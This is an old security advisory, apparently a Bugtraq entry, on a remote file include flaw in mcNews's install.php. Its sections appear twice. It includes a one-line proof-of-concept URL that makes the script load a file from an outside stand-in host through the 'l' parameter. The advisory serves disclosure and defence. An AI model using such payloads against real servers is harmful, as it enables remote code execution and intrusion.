McNews Install.PHP Arbitrary File Include Vulnerability
BID:12835
Info
McNews Install.PHP Arbitrary File Include Vulnerability
| Bugtraq ID: | 12835 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 17 2005 12:00AM |
| Updated: | Mar 17 2005 12:00AM |
| Credit: | Discovery of this vulnerability is credited to Jonathan Whiteley <[email protected]>. |
| Vulnerable: |
McNews McNews 1.3 McNews McNews 1.2 McNews McNews 1.1 a McNews McNews 1.1 McNews McNews 1.0 |
| Not Vulnerable: | |
Discussion
McNews Install.PHP Arbitrary File Include Vulnerability
mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script.
This issue is reported to affect mcNews versions 1.3 and prior.
mcNews is reportedly affected by a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'install.php' script.
This issue is reported to affect mcNews versions 1.3 and prior.
Exploit / POC
McNews Install.PHP Arbitrary File Include Vulnerability
No exploit is required.
The following proof of concept is available:
http://www.example.com/path/to/mcnews/admin/install.php?l=http://www.example.com
No exploit is required.
The following proof of concept is available:
http://www.example.com/path/to/mcnews/admin/install.php?l=http://www.example.com
Solution / Fix
McNews Install.PHP Arbitrary File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.